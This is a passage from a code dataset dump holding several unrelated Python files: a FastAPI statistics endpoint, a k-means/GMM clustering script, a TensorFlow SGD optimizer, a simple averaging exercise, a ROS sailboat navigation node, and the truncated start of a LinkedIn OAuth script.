default_error(e)\n response.status_code = err[0]\n result = err[1]\n return result\n\n@route.get(\"/total_statistics/{uuid}\")\n@inject\ndef total_statistics_this_queue(\n uuid: str,\n seconds: int,\n response: Response,\n stat_service: QueueStatisticsService = Depends(Provide[Container.queue_statistics_service]),\n HTTPBearerSecurity: HTTPBearer = Depends(security)\n):\n try:\n result = stat_service.total_stat_queue(uuid, seconds)\n except Exception as e:\n err = default_error(e)\n response.status_code = err[0]\n result = err[1]\n return result","repo_name":"BeyonD311/python_project","sub_path":"app/http/controllers/queue_statistic_controller.py","file_name":"queue_statistic_controller.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3815532359","text":"import itertools\nimport random\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\nimport scipy.stats as st\nimport pandas as pd\nfrom itertools import permutations\n\n\nK = 4\nINF = 9999999\nD = 2\nN = 1000\nn = 250\ncolors = \"bgrcmykw\"\n\n\ndef create_data():\n # mean = create_random_mean(K, D)\n mean = create_fixed_mean()\n cov = create_random_cov(K, D)\n X = np.zeros((N, D))\n color_index = 0\n for i in range(K):\n x = np.random.multivariate_normal(mean[i], cov=cov[i], size=n)\n plt.scatter(x[:, 0], x[:, 1], c=colors[color_index], marker=\".\")\n color_index = color_index + 1\n for j in range(n):\n X[j + i * n] = x[j]\n plt.title(\"Original Distribution\")\n plt.show()\n return X, mean\n\n\ndef create_random_cov(k, d):\n cov = np.zeros((k, d, d))\n for i in range(k):\n cov[i] = np.identity(d)\n for j in range(d):\n cov[i][j][j] = random.uniform(3, 5)\n return cov\n\n\ndef create_random_mean(k, f):\n mean = np.zeros((k, f))\n for i in range(k):\n for j in range(f):\n mean[i][j] = random.randint(-10, 10)\n return mean\n\n\ndef create_fixed_mean():\n # return [[-5, -5], [-5, 5], [5, -5], [5, 5]]\n return [[-4, -4], [-5, 6], [6, -5], [6, 4]]\n\n\ndef create_random_gmm_num(k, d):\n mean = create_random_mean(k, d)\n cov = np.zeros((k, d, d))\n for i in range(k):\n cov[i] = np.identity(d)\n ratio = np.ones(k) / k\n return mean, cov, ratio\n\n\ndef k_means(X, k, threshold=1e-20):\n X_flag = np.zeros(X.shape[0])\n mean = create_random_mean(k, X.shape[1])\n dis_start = cal_distance_all(X, k, mean)\n while True:\n dis_end = dis_start\n for i in range(X.shape[0]):\n flag = 0\n min_dis = INF\n for j in range(k):\n if min_dis > cal_distance(X[i, :], mean[j, :]):\n min_dis = cal_distance(X[i, :], mean[j, :])\n flag = j\n X_flag[i] = flag\n mean = update_mean(X, k, X_flag)\n dis_start = cal_distance_all(X, k, mean)\n if np.fabs(dis_end - dis_start) < threshold:\n break\n return mean, X_flag\n\n\ndef gmm(X, k, threshold=1e-5):\n mean, cov, ratio = create_random_gmm_num(k, X.shape[1])\n mean, x = k_means(X, k)\n last_log_likelihood = cal_log_likelihood(X, k, mean, cov, ratio)\n iters = 0\n while True:\n y_z = step_e(X, k, mean, cov, ratio)\n mean, cov, ratio = step_m(X, k, mean, cov, ratio, y_z)\n now_log_likelihood = cal_log_likelihood(X, k, mean, cov, ratio)\n print(now_log_likelihood)\n if last_log_likelihood < now_log_likelihood and (now_log_likelihood - last_log_likelihood) < threshold:\n break\n last_log_likelihood = now_log_likelihood\n iters = iters + 1\n if iters >= 50:\n break\n return X, y_z, mean\n\n\ndef draw_gmm(X, y_z, k, mean):\n label = np.zeros(X.shape[0])\n for i in range(k):\n label[i * n: (i + 1) * n] = i\n X = np.hstack((X, label.reshape(-1, 1)))\n for i in range(X.shape[0]):\n X[i, -1] = np.argmax(y_z[i, :])\n draw(X, k, mean, \"GMM \")\n\n\ndef draw_k_means(X, X_flag, k, mean):\n X = np.hstack((X, X_flag.reshape(-1, 1)))\n draw(X, k, mean, \"K_means \")\n\n\ndef draw(X, k, real_mean, method):\n for i in range(k):\n x = []\n for j in range(X.shape[0]):\n if X[j, -1] == i:\n x.append(X[j, 0:2])\n x = np.array(x)\n cal_mean = np.mean(x, axis=0)\n min = INF\n real_label = 0\n for p in range(k):\n if cal_distance(cal_mean, real_mean[p]) < min:\n min = cal_distance(cal_mean, real_mean[p])\n real_label = p\n\n colors_array = np.full(x.shape[0], colors[real_label], dtype=np.str_)\n plt.scatter(x[:, 0], x[:, 1], c=colors_array, marker=\".\")\n acc = cal_accuracy(X, k)\n plt.title(method + \"Classification\")\n plt.show()\n\n\ndef cal_accuracy(X, k):\n # 计算准确率\n accuracy = []\n per = np.zeros(k)\n for i in range(k):\n per[i] = i\n per = np.array(list(itertools.permutations([0, 1, 2, 3])))\n for i in range(per.shape[0]):\n count = 0\n for j in range(k):\n for p in range(int(X.shape[0] / k)):\n if X[p + (j * int(X.shape[0] / k)), -1] == per[i][j]:\n count = count + 1\n accuracy.append(count / X.shape[0])\n num_acc = np.argmax(accuracy)\n acc = accuracy[num_acc]\n print(\"准确率为:\"+str(acc))\n return acc\n\n\ndef step_e(X, k, mean, cov, ratio):\n # e步\n # y_z: 样本混合高斯叠加之后的后验概率\n # ratio: 每种高斯分布所占的比例\n # mean: 每种高斯分布的均值\n # cov: 每种高斯分布的协方差矩阵\n y_z = np.zeros((X.shape[0], k))\n for i in range(X.shape[0]):\n # 计算每个样本在混合高斯之后的后验概率\n ratio_sum = 0\n ratio_pdf = np.zeros(k)\n for j in range(k):\n ratio_pdf[j] = ratio[j] * st.multivariate_normal.pdf(X[i], mean=mean[j], cov=cov[j])\n ratio_sum = ratio_sum + ratio_pdf[j]\n for j in range(k):\n y_z[i, j] = ratio_pdf[j] / ratio_sum\n return y_z\n\n\ndef step_m(X, k, mean, cov, ratio, y_z):\n # m步 更新数据\n new_mean = np.zeros(mean.shape)\n new_cov = np.zeros(cov.shape)\n new_ratio = np.zeros(ratio.shape)\n for j in range(k):\n new_ratio[j] = np.sum(y_z[:, j]) / X.shape[0]\n y = y_z[:, j].reshape(-1, 1)\n new_mean[j, :] = (y.T @ X) / np.sum(y)\n new_cov[j] = ((X - mean[j]).T @ np.multiply((X - mean[j]), y) / np.sum(y))\n return new_mean, new_cov, new_ratio\n\n\ndef update_mean(X, k, X_flag):\n new_center = np.zeros((k, X.shape[1]))\n for i in range(k):\n count = 0\n for j in range(X.shape[0]):\n if X_flag[j] == i:\n new_center[i, :] = new_center[i, :] + X[j, :]\n count = count + 1\n if count != 0:\n new_center[i, :] = new_center[i, :] / count\n return new_center\n\n\ndef cal_log_likelihood(X, k, mean, cov, ratio):\n log_sum = 0\n for i in range(X.shape[0]):\n ratio_pdf_sum = 0\n for j in range(k):\n ratio_pdf_sum = ratio_pdf_sum + ratio[j] * st.multivariate_normal.pdf(X[j], mean=mean[j], cov=cov[j])\n log_sum = log_sum + np.log(ratio_pdf_sum)\n return log_sum\n\n\ndef cal_distance(X, center):\n return np.sum(np.power((X - center), 2))\n\n\ndef cal_distance_all(X, k, center):\n dis = 0\n for i in range(X.shape[0]):\n for j in range(k):\n dis = dis + cal_distance(X[i, :], center[j, :])\n return dis\n\n\ndef main():\n\n # 获取数据 以及真实的均值mean\n X, real_mean = create_data()\n\n # # k_means\n # mean_k_means, X_flag = k_means(X, K)\n # draw_k_means(X, X_flag, K, real_mean)\n\n # GMM_EM\n X_gmm, y_z, mean_gmm = gmm(X, K)\n draw_gmm(X, y_z, K, real_mean)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"1190200610/mechine_learning","sub_path":"k_means_and_GMM.py","file_name":"k_means_and_GMM.py","file_ext":"py","file_size_in_byte":6990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10592255672","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import gen_array_ops\nfrom tensorflow.python.ops import variable_scope\nfrom tensorflow.python.ops import variables as tf_variables\nfrom tensorflow.python.training import gradient_descent\nfrom libs.kfac import estimator as est\n\n\nclass SGDOptimizer(gradient_descent.GradientDescentOptimizer):\n \"\"\"\n SGD Optimizer\n \"\"\"\n\n def __init__(self,\n learning_rate,\n var_list=None,\n momentum=0.,\n weight_decay=0.,\n weight_decay_type=\"l2\",\n weight_list=\"all\",\n name=\"SGD\"):\n\n variables = var_list\n if variables is None:\n variables = tf_variables.trainable_variables()\n self.variables = variables\n\n weight_decay_type = weight_decay_type.lower()\n legal_weight_decay_types = [\"wd\", \"l2\", \"fisher\"]\n\n if weight_decay_type not in legal_weight_decay_types:\n raise ValueError(\"Unsupported weight decay type {}. Must be one of {}.\"\n .format(weight_decay_type, legal_weight_decay_types))\n\n self._momentum = momentum\n self._weight_decay = weight_decay\n self._weight_decay_type = weight_decay_type\n self._weight_list = weight_list\n\n super(SGDOptimizer, self).__init__(learning_rate, name=name)\n\n def minimize(self, *args, **kwargs):\n kwargs[\"var_list\"] = kwargs.get(\"var_list\") or self.variables\n if set(kwargs[\"var_list\"]) != set(self.variables):\n raise ValueError(\"var_list doesn't match with set of Fisher-estimating \"\n \"variables.\")\n return super(SGDOptimizer, self).minimize(*args, **kwargs)\n\n def compute_gradients(self, *args, **kwargs):\n # args[1] could be our var_list\n if len(args) > 1:\n var_list = args[1]\n else:\n kwargs[\"var_list\"] = kwargs.get(\"var_list\") or self.variables\n var_list = kwargs[\"var_list\"]\n if set(var_list) != set(self.variables):\n raise ValueError(\"var_list doesn't match with set of Fisher-estimating \"\n \"variables.\")\n return super(SGDOptimizer, self).compute_gradients(*args, **kwargs)\n\n def apply_gradients(self, grads_and_vars, *args, **kwargs):\n grads_and_vars = list(grads_and_vars)\n\n if self._weight_decay > 0.0:\n if self._weight_decay_type == \"l2\" or self._weight_decay_type == \"wd\":\n grads_and_vars = self._add_weight_decay(grads_and_vars)\n\n steps_and_vars = self._compute_update_steps(grads_and_vars)\n return super(SGDOptimizer, self).apply_gradients(steps_and_vars,\n *args, **kwargs)\n\n def _add_weight_decay(self, vecs_and_vars):\n if self._weight_list == \"all\":\n print(\"all\")\n return [(vec + self._weight_decay * gen_array_ops.stop_gradient(var), var)\n for vec, var in vecs_and_vars]\n elif self._weight_list == \"last\":\n print(\"last\")\n grad_list = []\n for vec, var in vecs_and_vars:\n if 'fc' not in var.name:\n grad_list.append((vec, var))\n else:\n grad_list.append(\n (vec + self._weight_decay *\n gen_array_ops.stop_gradient(var), var))\n return grad_list\n else:\n print(\"conv\")\n grad_list = []\n for vec, var in vecs_and_vars:\n if 'fc' in var.name:\n grad_list.append((vec, var))\n else:\n grad_list.append(\n (vec + self._weight_decay *\n gen_array_ops.stop_gradient(var), var))\n return grad_list\n\n def _compute_update_steps(self, grads_and_vars):\n return self._update_velocities(grads_and_vars, self._momentum)\n\n def _update_velocities(self, vecs_and_vars, decay, vec_coeff=1.0):\n def _update_velocity(vec, var):\n velocity = self._zeros_slot(var, \"velocity\", self._name)\n with ops.colocate_with(velocity):\n # Compute the new velocity for this variable.\n new_velocity = decay * velocity + vec_coeff * vec\n\n # Save the updated velocity.\n return (array_ops.identity(velocity.assign(new_velocity)), var)\n\n # Go through variable and update its associated part of the velocity vector.\n return [_update_velocity(vec, var) for vec, var in vecs_and_vars]\n","repo_name":"gd-zhang/Weight-Decay","sub_path":"libs/sgd/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":4857,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"40975036228","text":"# sum to averege \n\nn1 = float(input(\"Digite sua nota: \"))\nn2 = float(input(\"Digite sua nota: \"))\n\naverage = (n1 + n2) / 2\n\n# printing result\nprint(\"The average between {} and {} \\n The result: {}\".format(n1, n2, average))\n\n# () has priority at first math level\n# caracters *, /, **, % has priority at second math level\n# caracters +, - has priority at third math level","repo_name":"alejandrosilveiraramos/moreDevsTwoBlu","sub_path":"classes/module02/class02.py","file_name":"class02.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18943726447","text":"#!/usr/bin/env python\nimport rospy\nimport math\nfrom actionlib import SimpleActionClient\nfrom boat_msgs.msg import BoatState, GPS, MaxVMGAction, MaxVMGGoal, Point, Waypoint, TackingAction, TackingGoal, LaylineAction, LaylineGoal\nfrom boat_msgs.srv import ConvertPoint\nfrom std_msgs.msg import Float32\nfrom boat_utilities import points, angles, units\n\n## Trigger for when the wind shifts significantly\nnew_wind = False\n\n## Trigger for when we are navigating towards a brand new target\nis_new_target = False\n\n## The relative apparent wind heading, in degrees CCW from East\nane_reading = 0\n\n## The true apparent wind heading, in degrees CCW from East\napparent_wind_heading = 0\n\n## The current `boat_msgs.msg.BoatState`\nstate = BoatState()\n\n## The `boat_msgs.msg.Waypoint` describing the location to navigate to\ntarget = Waypoint()\n\n## The angle to the target point, in degrees CCW from East\ntarget_heading = 0\n\n## The current boat heading, in degrees CCW from East\ncur_boat_heading = 0\n\n## Initial of position of the boat when a new target is added\nstart_pos = Point()\n\n## Current boat position\ncur_pos = Point()\n\n## The boat's speed, in m/s\nboat_speed = 0\n\n## Minimum boat speed (in m/s) required to tack:\nmin_tacking_speed = rospy.get_param('/boat/nav/min_tacking_speed')\n\n## The maximum VMG found, in m/s\nmax_vmg = 0\n\n## Whether or not the max VMG has been found\nfound_max_vmg = False\n\n## Direct heading to next mark\ndirect_heading = 0\n\n## Beating parameter for determining when to tack\np = rospy.get_param('/boat/nav/beating')\n\n## The angle within which the boat cannot go (Irons)\nlayline = rospy.get_param('/boat/nav/layline')\n\n# Declare the publishers for the node\nheading_pub = rospy.Publisher('target_heading', Float32, queue_size=10)\nboat_state_pub = rospy.Publisher('boat_state', BoatState, queue_size=10)\nmax_vmg_client = SimpleActionClient('max_vmg_action', MaxVMGAction)\ntacking_client = SimpleActionClient('tacking_action', TackingAction)\nlayline_client = SimpleActionClient('layline_action', LaylineAction)\n\n# Service to convert gps to lps\nto_lps = rospy.ServiceProxy('gps_to_lps', ConvertPoint)\n\n# =*=*=*=*=*=*=*=*=*=*=*=*= ROS Callbacks =*=*=*=*=*=*=*=*=*=*=*=*=\n\n\n##\tCallback for setting the boat state when the `/boat_state` topic is updated\n#\n#\t@param new_state The new `boat_msgs.msg.BoatState` to set\n#\ndef boat_state_callback(new_state):\n global state\n state = new_state\n\n\n##\tCallback for setting the apparent wind heading when the `/anemometer` topic is updated\n#\n#\t@param new_heading The new anemometer reading, 180 is directly in front of boat increasing CCW\n#\ndef anemometer_callback(new_heading):\n global ane_reading\n global apparent_wind_heading\n global new_wind\n ane_reading = new_heading.data\n new_wind_heading = angles.normalize(ane_reading + cur_boat_heading)\n\n # Tolerance on a wind shift to be determined\n # Only update wind heading if a significant shift is detected, because it will then replan our upwind path\n if abs(new_wind_heading - apparent_wind_heading) > 0.1:\n new_wind = True\n apparent_wind_heading = new_wind_heading\n\n\n##\tCallback for setting the boat speed when the `/gps_raw` topic is updated\n#\n#\t@param gps The `boat_msgs.msg.GPS` message containing the current boat speed\n#\ndef gps_callback(gps):\n global boat_speed\n boat_speed = units.from_knots(gps.speed)\n\n\n##\tCallback for setting the boat's heading when the `/compass` topic is updated.\n#\n#\t@param compass The new heading to set, in degrees CCW from East\n#\ndef compass_callback(compass):\n global apparent_wind_heading\n global new_wind\n global cur_boat_heading\n global target_heading\n\n cur_boat_heading = compass.data\n new_wind_heading = angles.normalize(ane_reading + cur_boat_heading)\n\n # Tolerance on a wind shift to be determined\n # Only update wind heading if a significant shift is detected, because it will then replan our upwind path\n if abs(new_wind_heading - apparent_wind_heading) > 0.1:\n new_wind = True\n apparent_wind_heading = new_wind_heading\n\n # If we are in RC, update our target heading to be the same direction as we are pointing, so the path planner\n # will work when we switch to auto\n if state.major is not BoatState.MAJ_AUTONOMOUS:\n target_heading = cur_boat_heading\n\n\n##\tCallback for setting the target point when the `/target_point` topic is updated.\n#\n#\t@param new_target The `boat_msgs.msg.Waypoint` to set\n#\ndef target_callback(new_target):\n global target\n global is_new_target\n global start_pos\n\n new_target = Waypoint(to_lps(new_target.pt).pt, new_target.type)\n # If the target has changed, save the new target\n if abs(target.pt.x - new_target.pt.x) > 0.01 or abs(target.pt.y - new_target.pt.y) > 0.01:\n is_new_target = True\n target = new_target\n start_pos = cur_pos\n\n\n##\tCallback for setting the boat's location when the `/lps` topic is updated.\n#\n#\t@param position The `boat_msgs.msg.Point` to set\n#\ndef position_callback(position):\n global cur_pos\n cur_pos = position\n\n # If the boat isn't in the autonomous planning state, exit\n if state.major is not BoatState.MAJ_AUTONOMOUS or state.minor is not BoatState.MIN_PLANNING:\n return\n\n # Temporary jank solution\n if state.challenge is BoatState.CHA_AVOID:\n return\n\n awa_algorithm()\n\n\n# =*=*=*=*=*=*=*=*=*=*=*=*= Calculations =*=*=*=*=*=*=*=*=*=*=*=*=\n'''\n##\tCalculate the current velocity made good along the specified heading\n#\n#\t@param direct_heading The direct heading to the target, in degrees CCW from East\n#\t@return The current velocity made good\n#\ndef vmg(direct_heading):\n\treturn math.cos(cur_boat_heading - direct_heading) * boat_speed\n'''\n\n\n##\tCalculate the global maximum velocity made good of the entire system\n#\n#\t@param wind_coming The heading of the apparent wind, in degrees CCW from East\n#\t@return The theoretical max velocity made good\n#\ndef calc_global_max_vmg(wind_coming):\n\n # TODO: Make a service and make more general for object avoidance\n upper_bound = angles.normalize(wind_coming + layline)\n lower_bound = angles.normalize(wind_coming - layline)\n\n # If direct heading is in irons, then max_vmg will be on the edge of the no go zone\n if angles.is_within_bounds(direct_heading, lower_bound, upper_bound):\n\n # Snap to whichever edge of the no go zone is closer\n if angles.is_on_left(direct_heading, wind_coming):\n vmg_heading = upper_bound\n else:\n vmg_heading = lower_bound\n\n # Otherwise max vmg is just the direct heading\n else:\n vmg_heading = direct_heading\n\n # 2.5 Knots to m/s (measured boat speed)\n theoretic_boat_speed = units.from_knots(2.5)\n max_vmg = theoretic_boat_speed * angles.cosd(vmg_heading - direct_heading)\n return max_vmg, vmg_heading\n\n\n##\tCalculate the maximum velocity made good on the current tack\n#\n#\t@param wind_coming The heading of the apparent wind, in degrees CCW from East\n#\t@return The theoretical max velocity made good\n#\ndef calc_cur_tack_max_vmg(wind_coming):\n\n # TODO: Make a service and make more general for object avoidance\n upper_bound = angles.normalize(wind_coming + layline)\n lower_bound = angles.normalize(wind_coming - layline)\n\n # If direct heading is in irons, then max_vmg will be on the edge of the no go zone\n if angles.is_within_bounds(direct_heading, lower_bound, upper_bound):\n # 2.5 Knots to m/s (measured boat speed)\n theoretic_boat_speed = units.from_knots(2.5)\n\n # Snap to whichever edge of the no go zone is closer\n if angles.is_on_left(target_heading, wind_coming):\n vmg_heading = upper_bound\n else:\n vmg_heading = lower_bound\n\n # If the direct heading is somewhere in our current tack (direct_heading and target_heading on same side of wind)\n elif (angles.is_on_left(direct_heading, wind_coming) and angles.is_on_left(target_heading, wind_coming)) or\\\n (angles.is_on_right(direct_heading, wind_coming) and angles.is_on_right(target_heading, wind_coming)):\n # 2.5 Knots to m/s (measured boat speed)\n theoretic_boat_speed = units.from_knots(2.5)\n vmg_heading = direct_heading\n\n # If none of the above, the best heading will be on the opposite tack\n # however it is extremely unfavourable because clearly no best heading lies on this tack\n else:\n theoretic_boat_speed = 0\n vmg_heading = apparent_wind_heading\n\n max_vmg = theoretic_boat_speed * angles.cosd(vmg_heading - direct_heading)\n return max_vmg, vmg_heading\n\n\n##\tCalculate the current velocity made good along the current target heading\n#\n#\t@param wind_coming The heading of the apparent wind, in degrees CCW from East\n#\t@return The velocity made good\n#\ndef calc_vmg(wind_coming):\n tolerance = 1.0\n upper_bound = angles.normalize(wind_coming + layline - tolerance)\n lower_bound = angles.normalize(wind_coming - layline + tolerance)\n\n # If we are in irons, our theoretical speed is 0\n if angles.is_within_bounds(target_heading, lower_bound, upper_bound):\n theoretic_boat_speed = 0\n else:\n # 2.5 Knots to m/s (measured boat speed)\n theoretic_boat_speed = units.from_knots(2.5)\n\n cur_vmg = theoretic_boat_speed * angles.cosd(target_heading - direct_heading)\n return cur_vmg\n\n\n##\tCalculate the distance from the boat to the current target\n#\n#\t@param Boat's current position\n#\t@return The distance, in meters\n#\ndef dist_to_target(position):\n return points.dist(target.pt, position)\n\n\n## Determine the percentage of the course to the target is remaining\n#\n#\t@return Percentage of course remaining\n#\ndef remaining_course():\n cur_angle = angles.atan2d(cur_pos.y - start_pos.y, cur_pos.x - start_pos.x)\n start_angle = angles.atan2d(target.pt.y - start_pos.y, target.pt.x - start_pos.x)\n cur_angle = angles.normalize(cur_angle)\n start_angle = angles.normalize(start_angle)\n tot_dist = math.hypot(target.pt.y - start_pos.y, target.pt.x - start_pos.x)\n cur_dist = math.hypot(cur_pos.y - start_pos.y, cur_pos.x - start_pos.x)\n proj_dist = cur_dist * angles.cosd(cur_angle - start_angle)\n return 100 - (proj_dist / tot_dist) * 100.0\n\n\n## Determine if the boat is on the layline and can make the mark on the current heading\n#\n#\t@param wind_coming The heading of the apparent wind, in degrees CCW from East\n#\t@param tolerance The angular tolerance to the direct heading that the target heading needs to be\n#\t@return True for can make it, and false for not\n#\ndef on_layline(wind_coming, tolerance):\n\n # If waypoint is on left side of the wind, we are on the layline iff the target heading\n # is to the right of the direct heading\n if angles.is_on_left(direct_heading, wind_coming):\n val = angles.is_on_right(target_heading, direct_heading + tolerance)\n\n # If waypoint is on right side of the wind, we are on the layline iff the target heading\n # is to the left of the direct heading\n else:\n val = angles.is_on_left(target_heading, direct_heading - tolerance)\n\n return val\n\n\n# =*=*=*=*=*=*=*=*=*=*=*=*= Algorithms =*=*=*=*=*=*=*=*=*=*=*=*=\n\n\ndef awa_algorithm():\n global found_max_vmg\n global max_vmg\n global target_heading\n global new_wind\n global is_new_target\n global direct_heading\n\n # Calculate the direct heading to the next waypoint\n old_direct_heading = direct_heading\n direct_heading = angles.atan2d(target.pt.y - cur_pos.y, target.pt.x - cur_pos.x)\n direct_heading = angles.normalize(direct_heading)\n wind_coming = angles.opposite(apparent_wind_heading)\n\n # TODO: Make n a function of boat speed to negate the effects of apparent wind?\n # Tacking weight, can add app_wind_offset here to make even less desirable\n n = 1 + p * 1.3 / dist_to_target(start_pos)\n\n # Tolerance the headings and the wind possibly\n # TODO: Add a slow timer to this as well. Sometimes on state changes we get stuck because nothing updates.\n if new_wind or is_new_target or direct_heading is not old_direct_heading:\n new_wind = False\n is_new_target = False\n found_max_vmg = False\n max_vmg = 0\n\n # Calculate vmg on current path\n cur_vmg = calc_vmg(wind_coming)\n\n # Calculate max global vmg\n global_max_vmg, global_vmg_heading = calc_global_max_vmg(wind_coming)\n\n # Calculate the max vmg on the current tack\n cur_tack_max_vmg, cur_tack_vmg_heading = calc_cur_tack_max_vmg(wind_coming)\n\n #rospy.loginfo(rospy.get_caller_id() +\" Cur VMG: %f Max VMG: %f with Heading: %f Cur Tack VMG: %f with Heading: %f Direct Heading: %f\", cur_vmg, global_max_vmg, global_vmg_heading, cur_tack_max_vmg, cur_tack_vmg_heading, direct_heading)\n per_course_left = remaining_course()\n\n # TODO: Tolerance these properly\n # If not currently at our optimal vmg, during our regular upwind routine (not layline setup)\n if (global_max_vmg > cur_vmg or cur_tack_max_vmg > cur_vmg):\n # Is tack required to get to vmg_heading\n if (angles.is_on_left(global_vmg_heading, target_heading) and angles.is_on_left(wind_coming, target_heading) and angles.is_on_right(wind_coming, global_vmg_heading)) or\\\n (angles.is_on_right(global_vmg_heading, target_heading) and angles.is_on_left(wind_coming, global_vmg_heading) and angles.is_on_right(wind_coming, target_heading)):\n # If this loop is entered, then getting to vmg_heading requires a tack\n # Now we need to calculate if the tack is worth it\n if global_max_vmg > cur_tack_max_vmg * n and boat_speed >= min_tacking_speed:\n # Worth the tack, therefore determine the tacking direction and execute the action\n target_heading = global_vmg_heading\n if angles.is_on_left(target_heading, wind_coming):\n tacking_direction = -1\n else:\n tacking_direction = 1\n\n heading_pub.publish(Float32(target_heading))\n goal = TackingGoal(direction=tacking_direction)\n tacking_client.send_goal(goal)\n\n # Adjust time delay until the tack is considered failed, and we return to planning\n if not tacking_client.wait_for_result(rospy.Duration(10)):\n tacking_client.cancel_goal()\n goal.direction = goal.direction * -1\n tacking_client.send_goal(goal)\n if not tacking_client.wait_for_result(rospy.Duration(10)):\n tacking_client.cancel_goal()\n if tacking_client.get_result() is not None:\n target_heading = tacking_client.get_result().target_heading\n rospy.loginfo(rospy.get_caller_id() + \" Boat State = 'Autonomous - Planning'\")\n heading_pub.publish(target_heading)\n\n # If the tack is not worth preforming, set the current heading to be the max vmg of our current tack\n else:\n target_heading = cur_tack_vmg_heading\n #print target_heading\n heading_pub.publish(Float32(target_heading))\n\n # Tack is not required to get to vmg_heading, therefore set it\n else:\n target_heading = global_vmg_heading\n heading_pub.publish(Float32(target_heading))\n\n # Final leg of the course, traveling on an optimal vmg course, time to get to layline. Second condition to make sure this doesn't run if we are already on the layline\n # TODO: Tolerance correctly, make sure this isnt called on a downwind cuz we mistolerance it. Shouldnt be because target_heading will constantly be updating to be equal to global_vmg_heading above\n # TODO: Ensure this is only called once per run. Currently if we have a short laylineaction, it can get repeated\n elif (per_course_left <= 40 and not on_layline(wind_coming, 1.0)\n and boat_speed >= min_tacking_speed):\n rospy.loginfo(\n rospy.get_caller_id() +\n \" Entering the navigate to layline routine. Saved current tack angle as: %f \",\n target_heading)\n goal = LaylineGoal(alt_tack_angle=target_heading, overshoot_angle=3.0, target=target)\n layline_client.send_goal(goal)\n\n # Adjust time delay until the layline setup action is considered failed, and we return to planning\n if not layline_client.wait_for_result(rospy.Duration(40)):\n layline_client.cancel_goal()\n if layline_client.get_result() is not None:\n target_heading = layline_client.get_result().target_heading\n\n rospy.Rate(100).sleep()\n\n\n# DEPRECATED\ndef taras_algorithm():\n global state\n global apparent_wind_heading\n global new_wind\n global target\n global is_new_target\n global target_heading\n\n # Calculate the direct heading to the next waypoint\n # This should never be undefined, as the atan2(0,0) case would already be caught by the proximity check above\n best_heading = angles.atan2d(target.pt.y - cur_pos.y, target.pt.x - cur_pos.x)\n best_heading = angles.normalize(best_heading)\n wind_coming = angles.opposite(apparent_wind_heading)\n\n # If the direct path isn't possible...\n if best_heading > wind_coming - layline and best_heading < wind_coming + layline:\n\n # ... and there's new wind data or a new target, update the upwind path\n if new_wind or is_new_target:\n new_wind = False\n is_new_target = False\n\n # If the current heading is still acceptable, carry on\n #if target_heading <= wind_coming-layline+3 or target_heading >= wind_coming+layline-3 and not is_new_target:\n #\tbest_heading = target_heading\n #else:\n # If the waypoint is to the right of the wind...\n if best_heading > wind_coming:\n best_heading = wind_coming + layline\n else:\n best_heading = wind_coming - layline\n\n # If there isn't new wind data, DON'T update the heading\n else:\n best_heading = target_heading\n\n # If the target heading has updated, decide if we need to tack, then publish the new heading\n if best_heading is not target_heading:\n target_heading = best_heading\n\n # If the our headings are more that 180 degrees apart, reverse travel direction\n if (abs(target_heading - cur_boat_heading)) > 180:\n boat_dir = 1\n else:\n boat_dir = -1\n\n # Which direction the wind is coming from\n wind_coming = angles.opposite(apparent_wind_heading)\n\n # TODO: This may be broken now that is_within_bounds is not bi-directional\n if (boat_dir is 1 and not angles.is_within_bounds(wind_coming, cur_boat_heading, target_heading)) or\\\n (boat_dir is -1 and angles.is_within_bounds(wind_coming, cur_boat_heading, target_heading)):\n\n # Determine which direction to tack based on the side that our goal is on\n if angles.is_within_bounds(target_heading, 90, 270):\n tacking_direction = -1\n else:\n tacking_direction = 1\n\n heading_pub.publish(target_heading)\n\n goal = TackingGoal(direction=tacking_direction)\n tacking_client.send_goal(goal)\n\n # Adjust time delay until the tack is considered failed, and we return to planning\n if not tacking_client.wait_for_result(rospy.Duration(10)):\n tacking_client.cancel_goal()\n\n rospy.loginfo(rospy.get_caller_id() + \" Boat State = 'Autonomous - Planning'\")\n else:\n # Publish new heading for the rudder\n heading_pub.publish(target_heading)\n rospy.loginfo(rospy.get_caller_id() + \" New target heading: %f\", target_heading)\n\n rospy.Rate(100).sleep()\n\n\n##\tInitialize the node\n#\n#\tSets up all of the subscribers, initializes the node, and blocks until\n#\tthe action servers are ready\n#\ndef init():\n rospy.init_node('navigator')\n rospy.Subscriber('boat_state', BoatState, boat_state_callback)\n rospy.Subscriber('gps_raw', GPS, gps_callback)\n rospy.Subscriber('anemometer', Float32, anemometer_callback, queue_size=1)\n rospy.Subscriber('target_point', Waypoint, target_callback)\n rospy.Subscriber('compass', Float32, compass_callback, queue_size=1)\n\n # If the filters work, change lps to use /odometry/filtered\n rospy.Subscriber('lps', Point, position_callback, queue_size=1)\n max_vmg_client.wait_for_server()\n tacking_client.wait_for_server()\n layline_client.wait_for_server()\n rospy.spin()\n\n\nif __name__ == '__main__':\n try:\n init()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"uwsailbot/boat_2018","sub_path":"boat_nav/src/navigator_node.py","file_name":"navigator_node.py","file_ext":"py","file_size_in_byte":20914,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"41972090154","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport cPickle\nfrom linkedin import linkedin\nfrom linkedin.exceptions import LinkedInError\n\nCONSUMER_KEY = sys.argv[1]\nCONSUMER_SECRET = sys.argv[2]\nUSER_TOKEN = sys.argv[3]\nUSER_SECRET = sys.argv[4]\n\n# Parses out oauth_verifier parameter from window.location.href and\n# displays it for the user\n\nRETURN_URL = 'http://miningthesocialweb.appspot.com/static/linkedin_oauth_helper.html'\n\nauthentication = 